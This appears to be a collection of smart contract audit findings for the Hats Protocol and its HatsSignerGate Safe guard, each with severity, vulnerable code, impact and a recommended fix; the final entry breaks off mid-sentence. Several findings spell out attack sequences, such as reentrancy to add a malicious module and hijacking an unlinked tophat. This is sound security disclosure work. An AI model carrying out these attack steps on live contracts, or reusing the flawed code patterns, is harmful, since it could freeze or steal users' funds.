`HatsSignerGate` can be deployed with a fresh safe or connected to an existing safe. In the event that it is connected to an existing safe, it pulls the first 5 modules from that safe to count the number of connected modules. If there are more than 5 modules, it silently only takes the first five. This results in a mismatch between the real number of modules and `enabledModuleCount`, which causes all future transactions to revert.\\nWhen a `HatsSignerGate` is deployed to an existing safe, it pulls the existing modules with the following code:\\n```\\n(address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\nuint256 existingModuleCount = modules.length;\\n```\\n\\nBecause the modules are requested paginated with `5` as the second argument, it will return a maximum of `5` modules. If the safe already has more than `5` modules, only the first `5` will be returned.\\nThe result is that, while the safe has more than 5 modules, the gate will be set up with `enabledModuleCount = 5 + 1`.\\nWhen a transaction is executed, `checkTransaction()` will get the hash of the first 6 modules:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter the transaction, the first 7 modules will be checked to compare it:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nSince it already had more than 5 modules (now 6, with HatsSignerGate added), there will be a 7th module and the two hashes will be different. This will cause a revert.\\nThis would be a high severity issue, except that in the comments for the function it says:\\n/// @dev Do not attach HatsSignerGate to a Safe with more than 5 existing modules; its signers will not be able to execute any transactions\\nThis is the correct recommendation, but given the substantial consequences of getting it wrong, it should be enforced in code so that a safe with more modules reverts, rather than merely suggested in the comments.
The `deployHatsSignerGate()` function should revert if attached to a safe with more than 5 modules:\\n```\\nfunction deployHatsSignerGate(\\n uint256 _ownerHatId,\\n uint256 _signersHatId,\\n address _safe, // existing Gnosis Safe that the signers will join\\n uint256 _minThreshold,\\n uint256 _targetThreshold,\\n uint256 _maxSigners\\n) public returns (address hsg) {\\n // count up the existing modules on the safe\\n (address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\n uint256 existingModuleCount = modules.length;\\n// Add the line below\\n (address[] memory modulesWithSix,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 6);\\n// Add the line below\\n if (modules.length != moduleWithSix.length) revert TooManyModules();\\n\\n return _deployHatsSignerGate(\\n _ownerHatId, _signersHatId, _safe, _minThreshold, _targetThreshold, _maxSigners, existingModuleCount\\n );\\n}\\n```\\n
If a HatsSignerGate is deployed and connected to a safe with more than 5 existing modules, all future transactions sent through that safe will revert.
```\\n(address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\nuint256 existingModuleCount = modules.length;\\n```\\n
If a hat is owned by address(0), phony signatures will be accepted by the safe
medium
If a hat is sent to `address(0)`, the multisig will be fooled into accepting phony signatures on its behalf. This will throw off the proper accounting of signatures, allowing non-majority transactions to pass and potentially allowing users to steal funds.\\nIn order to validate that all signers of a transaction are valid signers, `HatsSignerGateBase.sol` implements the `countValidSignatures()` function, which recovers the signer for each signature and checks `isValidSigner()` on them.\\nThe function uses `ecrecover` to get the signer. However, `ecrecover` is well known to return `address(0)` in the event that a phony signature is passed with a `v` value other than 27 or 28. See this example for how this can be done.\\nIn the event that this is a base with only a single hat approved for signing, the `isValidSigner()` function will simply check if the owner is the wearer of a hat:\\n```\\nfunction isValidSigner(address _account) public view override returns (bool valid) {\\n valid = HATS.isWearerOfHat(_account, signersHatId);\\n}\\n```\\n\\nOn the `Hats.sol` contract, this simply checks their balance:\\n```\\nfunction isWearerOfHat(address _user, uint256 _hatId) public view returns (bool isWearer) {\\n isWearer = (balanceOf(_user, _hatId) > 0);\\n}\\n```\\n\\n... which only checks if it is active or eligible...\\n```\\nfunction balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n{\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n}\\n```\\n\\n... which calls out to ERC1155, which just returns the value in storage (without any address(0) check)...\\n```\\nfunction balanceOf(address owner, uint256 id) public view virtual returns (uint256 balance) {\\n balance = _balanceOf[owner][id];\\n}\\n```\\n\\nThe result is that, if a hat ends up owned by `address(0)` for any reason, this will give blanket permission for anyone to create a phony signature that will be accepted by the safe.\\nYou could imagine a variety of situations where this may apply:\\nAn admin minting a mutable hat to address(0) to adjust the supply while waiting for a delegatee to send over their address to transfer the hat to\\nAn admin sending a hat to address(0) because there is some reason why they need the supply slightly inflated\\nAn admin accidentally sending a hat to address(0) to burn it\\nNone of these examples are extremely likely, but there would be no reason for the admin to think they were putting their multisig at risk for doing so. However, the result would be a free signer on the multisig, which would have dramatic consequences.
The easiest option is to add a check in `countValidSignatures()` that confirms that `currentOwner != address(0)` after each iteration.
If a hat is sent to `address(0)`, any phony signature can be accepted by the safe, leading to transactions without sufficient support being executed.\\nThis is particularly dangerous in a 2/3 situation, where this issue would be sufficient for a single party to perform arbitrary transactions.
```\\nfunction isValidSigner(address _account) public view override returns (bool valid) {\\n valid = HATS.isWearerOfHat(_account, signersHatId);\\n}\\n```\\n
Swap Signer fails if final owner is invalid due to off by one error in loop
medium
New users attempting to call `claimSigner()` when there is already a full slate of owners are supposed to kick any invalid owners off the safe in order to swap in and take their place. However, the loop that checks this has an off-by-one error that misses checking the final owner.\\nWhen `claimSigner()` is called, it adds the `msg.sender` as a signer, as long as there aren't already too many owners on the safe.\\nHowever, in the case that there are already the maximum number of owners on the safe, it performs a check whether any of them are invalid. If they are, it swaps out the invalid owner for the new owner.\\n```\\nif (ownerCount >= maxSigs) {\\n bool swapped = _swapSigner(owners, ownerCount, maxSigs, currentSignerCount, msg.sender);\\n if (!swapped) {\\n // if there are no invalid owners, we can't add a new signer, so we revert\\n revert NoInvalidSignersToReplace();\\n }\\n}\\n```\\n\\n```\\nfunction _swapSigner(\\n address[] memory _owners,\\n uint256 _ownerCount,\\n uint256 _maxSigners,\\n uint256 _currentSignerCount,\\n address _signer\\n) internal returns (bool success) {\\n address ownerToCheck;\\n bytes memory data;\\n\\n for (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n "swapOwner(address,address,address)",\\n _findPrevOwner(_owners, ownerToCheck), // prevOwner\\n ownerToCheck, // oldOwner\\n _signer // newOwner\\n );\\n\\n // execute the swap, reverting if it fails for some reason\\n success = safe.execTransactionFromModule(\\n address(safe), // to\\n 0, // value\\n data, // data\\n Enum.Operation.Call // operation\\n );\\n\\n if (!success) {\\n revert FailedExecRemoveSigner();\\n }\\n\\n if (_currentSignerCount < _maxSigners) ++signerCount;\\n break;\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n\\nThis function is intended to iterate through all the owners, check if any is no longer valid, and — if that's the case — swap it for the new one.\\nHowever, in the case that all owners are valid except for the final one, it will miss the swap and reject the new owner.\\nThis is because there is an off by one error in the loop, where it iterates through `for (uint256 i; i < _ownerCount - 1;)...`\\nThis only iterates through all the owners up until the final one, and will miss the check for the validity and possible swap of the final owner.
Perform the loop with `ownerCount` instead of `ownerCount - 1` to check all owners:\\n```\\n// Remove the line below\\n for (uint256 i; i < _ownerCount // Remove the line below\\n 1;) {\\n// Add the line below\\n for (uint256 i; i < _ownerCount ;) {\\n ownerToCheck = _owners[i];\\n // rest of code\\n}\\n```\\n
When only the final owner is invalid, new users will not be able to claim their role as signer, even through they should.
```\\nif (ownerCount >= maxSigs) {\\n bool swapped = _swapSigner(owners, ownerCount, maxSigs, currentSignerCount, msg.sender);\\n if (!swapped) {\\n // if there are no invalid owners, we can't add a new signer, so we revert\\n revert NoInvalidSignersToReplace();\\n }\\n}\\n```\\n
targetThreshold can be set below minThreshold, violating important invariant
medium
There are protections in place to ensure that `minThreshold` is not set above `targetThreshold`, because the result is that the max threshold on the safe would be less than the minimum required. However, this check is not performed when `targetThreshold` is set, which results in the same situation.\\nWhen the `minThreshold` is set on `HatsSignerGateBase.sol`, it performs an important check that `minThreshold` <= targetThreshold:\\n```\\nfunction _setMinThreshold(uint256 _minThreshold) internal {\\n if (_minThreshold > maxSigners || _minThreshold > targetThreshold) {\\n revert InvalidMinThreshold();\\n }\\n\\n minThreshold = _minThreshold;\\n}\\n```\\n\\nHowever, when `targetThreshold` is set, there is no equivalent check that it remains above minThreshold:\\n```\\nfunction _setTargetThreshold(uint256 _targetThreshold) internal {\\n if (_targetThreshold > maxSigners) {\\n revert InvalidTargetThreshold();\\n }\\n\\n targetThreshold = _targetThreshold;\\n}\\n```\\n\\nThis is a major problem, because if it is set lower than `minThreshold`, `reconcileSignerCount()` will set the safe's threshold to be this value, which is lower than the minimum, and will cause all tranasctions to fail.
Perform a check in `_setTargetThreshold()` that it is greater than or equal to minThreshold:\\n```\\nfunction _setTargetThreshold(uint256 _targetThreshold) internal {\\n// Add the line below\\n if (_targetThreshold < minThreshold) {\\n// Add the line below\\n revert InvalidTargetThreshold();\\n// Add the line below\\n }\\n if (_targetThreshold > maxSigners) {\\n revert InvalidTargetThreshold();\\n }\\n\\n targetThreshold = _targetThreshold;\\n}\\n```\\n
Settings that are intended to be guarded are not, which can lead to parameters being set in such a way that all transactions fail.
```\\nfunction _setMinThreshold(uint256 _minThreshold) internal {\\n if (_minThreshold > maxSigners || _minThreshold > targetThreshold) {\\n revert InvalidMinThreshold();\\n }\\n\\n minThreshold = _minThreshold;\\n}\\n```\\n
Hats can be overwritten
medium
Child hats can be created under a non-existent admin. Creating the admin allows overwriting the properties of the child-hats, which goes against the immutability of hats.\\n```\\n function _createHat(\\n uint256 _id,\\n string calldata _details,\\n uint32 _maxSupply,\\n address _eligibility,\\n address _toggle,\\n bool _mutable,\\n string calldata _imageURI\\n ) internal returns (Hat memory hat) {\\n hat.details = _details;\\n hat.maxSupply = _maxSupply;\\n hat.eligibility = _eligibility;\\n hat.toggle = _toggle;\\n hat.imageURI = _imageURI;\\n hat.config = _mutable ? uint96(3 << 94) : uint96(1 << 95);\\n _hats[_id] = hat;\\n\\n\\n emit HatCreated(_id, _details, _maxSupply, _eligibility, _toggle, _mutable, _imageURI);\\n }\\n```\\n\\nNow, the next eligible hat for this admin is 1.1.1, which is a hat that was already created and minted. This can allow the admin to change the properties of the child, even if the child hat was previously immutable. This contradicts the immutability of hats, and can be used to rug users in multiple ways, and is thus classified as high severity. This attack can be carried out by any hat wearer on their child tree, mutating their properties.
Check if admin exists, before minting by checking any of its properties against default values\\n```\\nrequire(_hats[admin].maxSupply > 0, "Admin not created")\\n```\\n
null
```\\n function _createHat(\\n uint256 _id,\\n string calldata _details,\\n uint32 _maxSupply,\\n address _eligibility,\\n address _toggle,\\n bool _mutable,\\n string calldata _imageURI\\n ) internal returns (Hat memory hat) {\\n hat.details = _details;\\n hat.maxSupply = _maxSupply;\\n hat.eligibility = _eligibility;\\n hat.toggle = _toggle;\\n hat.imageURI = _imageURI;\\n hat.config = _mutable ? uint96(3 << 94) : uint96(1 << 95);\\n _hats[_id] = hat;\\n\\n\\n emit HatCreated(_id, _details, _maxSupply, _eligibility, _toggle, _mutable, _imageURI);\\n }\\n```\\n
Unlinked tophat retains linkedTreeRequests, can be rugged
high
When a tophat is unlinked from its admin, it is intended to regain its status as a tophat that is fully self-sovereign. However, because the `linkedTreeRequests` value isn't deleted, an independent tophat could still be vulnerable to "takeover" from another admin and could lose its sovereignty.\\nFor a tophat to get linked to a new tree, it calls `requestLinkTopHatToTree()` function:\\n```\\nfunction requestLinkTopHatToTree(uint32 _topHatDomain, uint256 _requestedAdminHat) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n\\n _checkAdmin(fullTopHatId);\\n\\n linkedTreeRequests[_topHatDomain] = _requestedAdminHat;\\n emit TopHatLinkRequested(_topHatDomain, _requestedAdminHat);\\n}\\n```\\n\\nThis creates a "request" to link to a given admin, which can later be approved by the admin in question:\\n```\\nfunction approveLinkTopHatToTree(uint32 _topHatDomain, uint256 _newAdminHat) external {\\n // for everything but the last hat level, check the admin of `_newAdminHat`'s theoretical child hat, since either wearer or admin of `_newAdminHat` can approve\\n if (getHatLevel(_newAdminHat) < MAX_LEVELS) {\\n _checkAdmin(buildHatId(_newAdminHat, 1));\\n } else {\\n // the above buildHatId trick doesn't work for the last hat level, so we need to explicitly check both admin and wearer in this case\\n _checkAdminOrWearer(_newAdminHat);\\n }\\n\\n // Linkages must be initiated by a request\\n if (_newAdminHat != linkedTreeRequests[_topHatDomain]) revert LinkageNotRequested();\\n\\n // remove the request -- ensures all linkages are initialized by unique requests,\\n // except for relinks (see `relinkTopHatWithinTree`)\\n delete linkedTreeRequests[_topHatDomain];\\n\\n // execute the link. Replaces existing link, if any.\\n _linkTopHatToTree(_topHatDomain, _newAdminHat);\\n}\\n```\\n\\nThis function shows that if there is a pending `linkedTreeRequests`, then the admin can use that to link the tophat into their tree and claim authority over it.\\nWhen a tophat is unlinked, it is expected to regain its sovereignty:\\n```\\nfunction unlinkTopHatFromTree(uint32 _topHatDomain) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n _checkAdmin(fullTopHatId);\\n\\n delete linkedTreeAdmins[_topHatDomain];\\n emit TopHatLinked(_topHatDomain, 0);\\n}\\n```\\n\\nHowever, this function does not delete `linkedTreeRequests`.\\nTherefore, the following set of actions is possible:\\nTopHat is linked to Admin A\\nAdmin A agrees to unlink the tophat\\nAdmin A calls `requestLinkTopHatToTree` with any address as the admin\\nThis call succeeds because Admin A is currently an admin for TopHat\\nAdmin A unlinks TopHat as promised\\nIn the future, the address chosen can call `approveLinkTopHatToTree` and take over admin controls for the TopHat without the TopHat's permission
In `unlinkTopHatFromTree()`, the `linkedTreeRequests` should be deleted:\\n```\\nfunction unlinkTopHatFromTree(uint32 _topHatDomain) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n _checkAdmin(fullTopHatId);\\n\\n delete linkedTreeAdmins[_topHatDomain];\\n// Add the line below\\n delete linkedTreeRequests[_topHatDomain];\\n emit TopHatLinked(_topHatDomain, 0);\\n}\\n```\\n
Tophats that expect to be fully self-sovereign and without any oversight can be surprisingly claimed by another admin, because settings from a previous admin remain through unlinking.
```\\nfunction requestLinkTopHatToTree(uint32 _topHatDomain, uint256 _requestedAdminHat) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n\\n _checkAdmin(fullTopHatId);\\n\\n linkedTreeRequests[_topHatDomain] = _requestedAdminHat;\\n emit TopHatLinkRequested(_topHatDomain, _requestedAdminHat);\\n}\\n```\\n
Safe can be bricked because threshold is updated with validSignerCount instead of newThreshold
high
The safe's threshold is supposed to be set with the lower value of the `validSignerCount` and the `targetThreshold` (intended to serve as the maximum). However, the wrong value is used in the call to the safe's function, which in some circumstances can lead to the safe being permanently bricked.\\nIn `reconcileSignerCount()`, the valid signer count is calculated. We then create a value called `newThreshold`, and set it to the minimum of the valid signer count and the target threshold. This is intended to be the value that we update the safe's threshold with.\\n```\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\n```\\n\\nHowever, there is a typo in the contract call, which accidentally uses `validSignerCount` instead of `newThreshold`.\\nThe result is that, if there are more valid signers than the `targetThreshold` that was set, the threshold will be set higher than intended, and the threshold check in `checkAfterExecution()` will fail for being above the max, causing all safe transactions to revert.\\nThis is a major problem because it cannot necessarily be fixed. In the event that it is a gate with a single hat signer, and the eligibility module for the hat doesn't have a way to turn off eligibility, there will be no way to reduce the number of signers. If this number is greater than `maxSigners`, there is no way to increase `targetThreshold` sufficiently to stop the reverting.\\nThe result is that the safe is permanently bricked, and will not be able to perform any transactions.
Change the value in the function call from `validSignerCount` to `newThreshold`.\\n```\\nif (newThreshold > 0) {\\n// Remove the line below\\n bytes memory data = abi.encodeWithSignature("changeThreshold(uint256)", validSignerCount);\\n// Add the line below\\n bytes memory data = abi.encodeWithSignature("changeThreshold(uint256)", newThreshold);\\n\\n bool success = safe.execTransactionFromModule(\\n address(safe), // to\\n 0, // value\\n data, // data\\n Enum.Operation.Call // operation\\n );\\n\\n if (!success) {\\n revert FailedExecChangeThreshold();\\n }\\n}\\n```\\n
All transactions will revert until `validSignerCount` can be reduced back below `targetThreshold`, which re
```\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\n```\\n
Signers can bypass checks to add new modules to a safe by abusing reentrancy
high
The `checkAfterExecution()` function has checks to ensure that new modules cannot be added by signers. This is a crucial check, because adding a new module could give them unlimited power to make any changes (with no guards in place) in the future. However, by abusing reentrancy, the parameters used by the check can be changed so that this crucial restriction is violated.\\nThe `checkAfterExecution()` is intended to uphold important invariants after each signer transaction is completed. This is intended to restrict certain dangerous signer behaviors, the most important of which is adding new modules. This was an issue caught in the previous audit and fixed by comparing the hash of the modules before execution to the has of the modules after.\\nBefore:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nThis is further emphasized in the comments, where it is specified:\\n/// @notice Post-flight check to prevent `safe` signers from removing this contract guard, changing any modules, or changing the threshold\\nWhy Restricting Modules is Important\\nModules are the most important thing to check. This is because modules have unlimited power not only to execute transactions but to skip checks in the future. Creating an arbitrary new module is so bad that it is equivalent to the other two issues together: getting complete control over the safe (as if threshold was set to 1) and removing the guard (because they aren't checked in module transactions).\\nHowever, this important restriction can be violated by abusing reentrancy into this function.\\nReentrancy Disfunction\\nTo see how this is possible, we first have to take a quick detour regarding reentrancy. It appears that the protocol is attempting to guard against reentrancy with the `guardEntries` variable. It is incremented in `checkTransaction()` (before a transaction is executed) and decremented in `checkAfterExecution()` (after the transaction has completed).\\nThe only protection it provides is in its risk of underflowing, explained in the comments as:\\n// leave checked to catch underflows triggered by re-erntry attempts\\nHowever, any attempt to reenter and send an additional transaction midstream of another transaction would first trigger the `checkTransaction()` function. This would increment `_guardEntries` and would lead to it not underflowing.\\nIn order for this system to work correctly, the `checkTransaction()` function should simply set `_guardEntries = 1`. This would result in an underflow with the second decrement. But, as it is currently designed, there is no reentrancy protection.\\nUsing Reentrancy to Bypass Module Check\\nRemember that the module invariant is upheld by taking a snapshot of the hash of the modules in `checkTransaction()` and saving it in the `_existingModulesHash` variable.\\nHowever, imagine the following set of transactions:\\nSigners send a transaction via the safe, and modules are snapshotted to `_existingModulesHash`\\nThe transaction uses the Multicall functionality of the safe, and performs the following actions:\\nFirst, it adds the malicious module to the safe\\nThen, it calls `execTransaction()` on itself with any another transaction\\nThe second call will call `checkTransaction()`\\nThis will update `_existingModulesHash` to the new list of modules, including the malicious one\\nThe second call will execute, which doesn't matter (could just be an empty transaction)\\nAfter the transaction, `checkAfterExecution()` will be called, and the modules will match\\nAfter the full transaction is complete, `checkAfterExecution()` will be called for the first transaction, but since `_existingModulesHash` will be overwritten, the module check will pass
Use a more typical reentrancy guard format, such as checking to ensure `_guardEntries == 0` at the top of `checkTransaction()` or simply setting `_guardEntries = 1` in `checkTransaction()` instead of incrementing it.
Any number of signers who are above the threshold will be able to give themselves unlimited access over the safe with no restriction going forward.
```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n
If another module adds a module, the safe will be bricked
high
If a module is added by another module, it will bypass the `enableNewModule()` function that increments `enabledModuleCount`. This will throw off the module validation in `checkTransaction()` and `checkAfterExecution()` and could cause the safe to become permanently bricked.\\nIn order to ensure that signers cannot add new modules to the safe (thus giving them unlimited future governing power), the guard portion of the gate checks that the hash of the modules before the transaction is the same as the hash after.\\nBefore:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nYou'll note that the "before" check uses `enabledModuleCount` and the "after" check uses `enabledModuleCount + 1`. The reason for this is that we want to be able to catch whether the user added a new module, which requires us taking a larger pagination to make sure we can view the additional module.\\nHowever, if we were to start with a number of modules larger than `enabledModuleCount`, the result would be that the "before" check would clip off the final modules, and the "after" check would include them, thus leading to different hashes.\\nThis situation can only arise if a module is added that bypasses the `enableModule()` function. But this exact situation can happen if one of the other modules on the safe adds a module to the safe.\\nIn this case, the modules on the safe will increase but `enabledModuleCount` will not. This will lead to the "before" and "after" checks returning different arrays each time, and therefore disallowing transactions.\\nThe only possible ways to fix this problem will be to have the other module remove the additional one they added. But, depending on the specific circumstances, this option may not be possible. For example, the module that performed the adding may not have the ability to remove modules.
The module guarding logic needs to be rethought. Given the large number of unbounded risks it opens up, I would recommend not allowing other modules on any safes that use this functionality.
The safe can be permanently bricked, with the guard functions disallowing any transactions. All funds in the safe will remain permanently stuck.
```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n
Signers can brick safe by adding unlimited additional signers while avoiding checks
high
There are a number of checks in `checkAfterExecution()` to ensure that the signers cannot perform any illegal actions to exert too much control over the safe. However, there is no check to ensure that additional owners are not added to the safe. This could be done in a way that pushes the total over `maxSigners`, which will cause all future transactions to revert.\\nThis means that signers can easily collude to freeze the contract, giving themselves the power to hold the protocol ransom to unfreeze the safe and all funds inside it.\\nWhen new owners are added to the contract through the `claimSigner()` function, the total number of owners is compared to `maxSigners` to ensure it doesn't exceed it.\\nHowever, owners can also be added by a normal `execTransaction` function. In this case, there are very few checks (all of which could easily or accidentally be missed) to stop us from adding too many owners:\\n```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n\\nThat means that either in the case that (a) the safe's threshold is already at `targetThreshold` or (b) the owners being added are currently toggled off or have eligibility turned off, this check will pass and the owners will be added.\\nOnce they are added, all future transactions will fail. Each time a transaction is processed, `checkTransaction()` is called, which calls `reconcileSignerCount()`, which has the following check:\\n```\\nif (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n}\\n```\\n\\nThis will revert as long as the new owners are now activated as valid signers.\\nIn the worst case scenario, valid signers wearing an immutable hat are added as owners when the safe's threshold is already above `targetThreshold`. The check passes, but the new owners are already valid signers. There is no admin action that can revoke the validity of their hats, so the `reconcileSignerCount()` function will always revert, and therefore the safe is unusable.\\nSince `maxSigners` is immutable and can't be changed, the only solution is for the hat wearers to renounce their hats. Otherwise, the safe will remain unusable with all funds trapped inside.
There should be a check in `checkAfterExecution()` that ensures that the number of owners on the safe has not changed throughout the execution.\\nIt also may be recommended that the `maxSigners` value is adjustable by the contract owner.
Signers can easily collude to freeze the contract, giving themselves the power to hold the protocol ransom to unfreeze the safe and all funds inside it.\\nIn a less malicious case, signers might accidentally add too many owners and end up needing to manage the logistics of having users renounce their hats.
```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n
HatsSignerGate + MultiHatsSignerGate: more than maxSignatures can be claimed which leads to DOS in reconcileSignerCount
high
The `HatsSignerGate.claimSigner` and `MultiHatsSignerGate.claimSigner` functions allow users to become signers.\\nIt is important that both functions do not allow that there exist more valid signers than `maxSigners`.\\nThis is because if there are more valid signers than `maxSigners`, any call to `HatsSignerGateBase.reconcileSignerCount` reverts, which means that no transactions can be executed.\\nThe only possibility to resolve this is for a valid signer to give up his signer hat. No signer will voluntarily give up his signer hat. And it is wrong that a signer must give it up. Valid signers that have claimed before `maxSigners` was reached should not be affected by someone trying to become a signer and exceeding `maxSigners`. In other words the situation where one of the signers needs to give up his signer hat should have never occurred in the first place.\\nThink of the following scenario:\\n`maxSignatures=10` and there are 10 valid signers\\nThe signers execute a transaction that calls `Safe.addOwnerWithThreshold` such that there are now 11 owners (still there are 10 valid signers)\\nOne of the 10 signers is no longer a wearer of the hat and `reconcileSignerCount` is called. So there are now 9 valid signers and 11 owners\\nThe signer that was no longer a wearer of the hat in the previous step now wears the hat again. However `reconcileSignerCount` is not called. So there are 11 owners and 10 valid signers. The HSG however still thinks there are 9 valid signers.\\nWhen a new signer now calls `claimSigner`, all checks will pass and he will be swapped for the owner that is not a valid signer:\\n```\\n // 9 >= 10 is false\\n if (currentSignerCount >= maxSigs) {\\n revert MaxSignersReached();\\n }\\n\\n // msg.sender is a new signer so he is not yet owner\\n if (safe.isOwner(msg.sender)) {\\n revert SignerAlreadyClaimed(msg.sender);\\n }\\n\\n // msg.sender is a valid signer, he wears the signer hat\\n if (!isValidSigner(msg.sender)) {\\n revert NotSignerHatWearer(msg.sender);\\n }\\n```\\n\\nSo there are now 11 owners and 11 valid signers. This means when `reconcileSignerCount` is called, the following lines cause a revert:\\n```\\n function reconcileSignerCount() public {\\n address[] memory owners = safe.getOwners();\\n uint256 validSignerCount = _countValidSigners(owners);\\n\\n // 11 > 10\\n if (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n }\\n```\\n
The `HatsSignerGate.claimSigner` and `MultiHatsSignerGate.claimSigner` functions should call `reconcileSignerCount` such that they work with the correct amount of signers and the scenario described in this report cannot occur.\\n```\\ndiff --git a/src/HatsSignerGate.sol b/src/HatsSignerGate.sol\\nindex 7a02faa..949d390 100644\\n--- a/src/HatsSignerGate.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/src/HatsSignerGate.sol\\n@@ -34,6 // Add the line below\\n34,8 @@ contract HatsSignerGate is HatsSignerGateBase {\\n /// @notice Function to become an owner on the safe if you are wearing the signers hat\\n /// @dev Reverts if `maxSigners` has been reached, the caller is either invalid or has already claimed. Swaps caller with existing invalid owner if relevant.\\n function claimSigner() public virtual {\\n// Add the line below\\n reconcileSignerCount();\\n// Add the line below\\n\\n uint256 maxSigs = maxSigners; // save SLOADs\\n uint256 currentSignerCount = signerCount;\\n```\\n\\n```\\ndiff --git a/src/MultiHatsSignerGate.sol b/src/MultiHatsSignerGate.sol\\nindex da74536..57041f6 100644\\n--- a/src/MultiHatsSignerGate.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/src/MultiHatsSignerGate.sol\\n@@ -39,6 // Add the line below\\n39,8 @@ contract MultiHatsSignerGate is HatsSignerGateBase {\\n /// @dev Reverts if `maxSigners` has been reached, the caller is either invalid or has already claimed. Swaps caller with existing invalid owner if relevant.\\n /// @param _hatId The hat id to claim signer rights for\\n function claimSigner(uint256 _hatId) public {\\n// Add the line below\\n reconcileSignerCount();\\n// Add the line below\\n \\n uint256 maxSigs = maxSigners; // save SLOADs\\n uint256 currentSignerCount = signerCount;\\n```\\n
As mentioned before, we end up in a situation where one of the valid signers has to give up his signer hat in order for the HSG to become operable again.\\nSo one of the valid signers that has rightfully claimed his spot as a signer may lose his privilege to sign transactions.
```\\n // 9 >= 10 is false\\n if (currentSignerCount >= maxSigs) {\\n revert MaxSignersReached();\\n }\\n\\n // msg.sender is a new signer so he is not yet owner\\n if (safe.isOwner(msg.sender)) {\\n revert SignerAlreadyClaimed(msg.sender);\\n }\\n\\n // msg.sender is a valid signer, he wears the signer hat\\n if (!isValidSigner(msg.sender)) {\\n revert NotSignerHatWearer(msg.sender);\\n }\\n```\\n
Signers can bypass checks and change threshold within a transaction
high
The `checkAfterExecution()` function has checks to ensure that the safe's threshold isn't changed by a transaction executed by signers. However, the parameters used by the check can be changed midflight so that this crucial restriction is violated.\\nThe `checkAfterExecution()` is intended to uphold important invariants after each signer transaction is completed. This is intended to restrict certain dangerous signer behaviors. From the docs:\\n/// @notice Post-flight check to prevent `safe` signers from removing this contract guard, changing any modules, or changing the threshold\\nHowever, the restriction that the signers cannot change the threshold can be violated.\\nTo see how this is possible, let's check how this invariant is upheld. The following check is performed within the function:\\n```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n```\\n\\nIf we look up `_getCorrectThreshold()`, we see the following:\\n```\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < 